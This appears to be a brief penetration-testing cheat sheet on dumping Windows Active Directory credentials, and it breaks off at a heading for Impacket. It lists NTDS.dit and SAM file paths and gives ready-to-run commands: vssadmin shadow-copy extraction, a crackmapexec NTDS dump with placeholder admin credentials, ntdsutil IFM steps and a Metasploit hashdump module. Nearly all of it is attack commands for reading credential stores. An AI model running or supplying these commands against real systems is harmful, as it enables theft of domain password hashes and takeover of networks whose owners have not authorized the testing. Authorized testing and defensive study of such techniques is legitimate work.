description: other miscellaneous

Others

Dump NTDS

NTDS file location

c:\windows\ntds\ntds.dit

Backup files if contain sam

Windows/system32/config/SAM

/WINDOWS/repair/SAM

regedit.exe HKEY_LOCAL_MACHINE -> SAM

Manual NTDS.dit Extraction using vssadmin

vssadmin create shadow /for=C: 
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit 
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM c:\SYSTEM 

Dump NTDS.dit with Crackmapexec

crackmapexec smb <target>-u admin -p Password123 -d domain --ntds drsuapi

ntdsutil

activate instance ntds 
ifm 
create full C:\ntdsutil 
quit 
quit 

Get files from:

c:\ntdsutil\active directory

Metasploit

windows/gather/credentials/domain_hashdump

Impacket